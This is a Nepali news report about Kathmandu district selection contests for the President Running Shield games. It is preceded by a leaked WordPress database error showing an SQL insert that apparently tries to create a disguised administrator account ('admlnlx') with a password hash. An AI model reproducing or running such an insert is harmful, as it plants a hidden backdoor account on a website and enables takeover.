WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B71zaX1B8iigxIlvdSwPMBsreD2Hs.0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-28 16:16:13', '', 'admlnlx', 'admlnlx')
काठमाडौं,फागुन ४–
नवौँं राष्ट्रपति रनिङ सिल्ड खेलकुद प्रतियोगिताका लागि काठमाडौँ निर्वाचन क्षेत्रको खेलाडी छनोट प्रतियोगिता भोलिदेखि सुरु हुँदैछ ।
काठमाडौँ जिल्ला खेलकुद विकास समितिको आयोजनामा हुने काठमाडौं जिल्लास्तरीय उक्त प्रतियोगितामा विभिन्न १० निर्वाचन क्षेत्रको छनोट यही फागुन १६ गतेसम्म सञ्चालन हुनेछ । छनोट प्रतियोगितामा एथलेटिक्स, भलिबल र कबड्डीमा प्रतिस्पर्धा हुने आयोजक समितिका अध्यक्ष ध्रुवराज न्यौपानेले जानकारी दिनुभयो । जिल्लाव्यापी प्रतियोगितामा यी तीन खेलसहित कराँते, तेक्वान्दो र उसुमा पनि प्रतिस्पर्धा हुने आयोजक समितिका कार्यालय प्रमुख लीलाराम बस्नेतले बताउनुभयो ।
फागुन २० गतेदेखि २२ गतेसम्म सो प्रतियोगिता सञ्चालन हुनेछ । -रासस